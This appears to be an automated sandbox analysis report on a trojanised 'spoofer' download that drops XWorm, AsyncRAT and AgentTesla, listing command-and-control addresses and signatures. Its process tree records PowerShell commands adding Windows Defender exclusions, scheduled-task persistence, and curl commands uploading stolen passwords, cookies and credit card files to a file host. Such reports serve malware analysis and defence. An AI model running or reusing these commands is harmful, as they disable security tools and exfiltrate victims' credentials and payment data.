Analysis
-
max time kernel
188s -
max time network
193s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
-
submitted
22-07-2024 18:37
General
-
Target
https://megawrzuta.pl/download/a37d5e686e4f49742da6a1037228b741.html
Malware Config
Extracted
xworm
185.254.97.15:1337
176.96.138.55:1338
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
asyncrat
Default
185.254.97.15:2024
-
delay
1
-
install
true
-
install_file
OperaGx.exe
-
install_folder
%AppData%
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect Xworm Payload 4 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
AgentTesla payload 2 IoCs
-
Async RAT payload 1 IoCs
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 8 IoCs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 19 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 6 IoCs
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies registry class 25 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
NTFS ADS 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 16 IoCs
-
Suspicious use of SetWindowsHookEx 14 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://megawrzuta.pl/download/a37d5e686e4f49742da6a1037228b741.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff993b63cb8,0x7ff993b63cc8,0x7ff993b63cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1852 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7216 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7348 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1912,9536164203978954095,14163938951907657441,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6992 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1880 -prefMapHandle 1872 -prefsLen 25751 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d8dfaf7-342e-4d82-949a-b5a0c5ce085f} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2324 -prefMapHandle 2320 -prefsLen 25787 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2af2d1b9-99e1-488b-a614-b777a618f824} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" socket3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3020 -childID 1 -isForBrowser -prefsHandle 3316 -prefMapHandle 3312 -prefsLen 25928 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ca7b0b-a29f-43f8-ac0e-e2cbba201b12} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3672 -childID 2 -isForBrowser -prefsHandle 3656 -prefMapHandle 3644 -prefsLen 31161 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {937271b7-6cc2-41bb-a8ce-ed2c443cf7ae} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4840 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4832 -prefMapHandle 4824 -prefsLen 31161 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0cdaa238-6274-402a-a85c-26b06059ea03} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" utility3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5444 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d42aeb8a-7df0-43d7-85c9-e372a79112b0} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 4 -isForBrowser -prefsHandle 5596 -prefMapHandle 5600 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35cb5b19-1967-4bc4-b02e-8607a63fcfb0} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5484 -childID 5 -isForBrowser -prefsHandle 5812 -prefMapHandle 5820 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95c093e6-6e54-412e-850b-017a56eaf3c8} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6168 -childID 6 -isForBrowser -prefsHandle 6160 -prefMapHandle 6156 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a05269cd-a6c4-4c10-b997-f8f60a2ce78a} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3996 -childID 7 -isForBrowser -prefsHandle 4464 -prefMapHandle 3228 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f04c24e1-b00c-4713-8a79-c12c588d3798} 4764 "\\.\pipe\gecko-crash-server-pipe.4764" tab3⤵
-
-
C:\Users\Admin\Downloads\7z2407-x64.exe"C:\Users\Admin\Downloads\7z2407-x64.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Debug\" -spe -an -ai#7zMap28319:72:7zEvent304181⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\Debug\spoofer.exe"C:\Users\Admin\Downloads\Debug\spoofer.exe"1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/ratleaks2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff993b63cb8,0x7ff993b63cc8,0x7ff993b63cd83⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/ratleaks2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff993b63cb8,0x7ff993b63cc8,0x7ff993b63cd83⤵
-
-
-
C:\Windows\Fonts\Update.exe"C:\Windows\Fonts\Update.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\External_V3'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'External_V3'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "External_V3" /tr "C:\Users\Admin\AppData\Roaming\External_V3"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "External_V3"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3588.tmp.bat""3⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\Fonts\Ethone.exe"C:\Windows\Fonts\Ethone.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\Ethone.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ethone.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Kacper'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Kacper'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Kacper" /tr "C:\Users\Admin\AppData\Roaming\Kacper"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\Fonts\1.exe"C:\Windows\Fonts\1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OperaGx" /tr '"C:\Users\Admin\AppData\Roaming\OperaGx.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "OperaGx" /tr '"C:\Users\Admin\AppData\Roaming\OperaGx.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7620.tmp.bat""3⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\OperaGx.exe"C:\Users\Admin\AppData\Roaming\OperaGx.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "OperaGx"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "OperaGx"6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB1BD.tmp.bat""5⤵
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Windows\Fonts\tak.exe"C:\Windows\Fonts\tak.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Fonts\tak.exe"C:\Windows\Fonts\tak.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"4⤵
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"4⤵
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"4⤵
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile5⤵
-
-
-
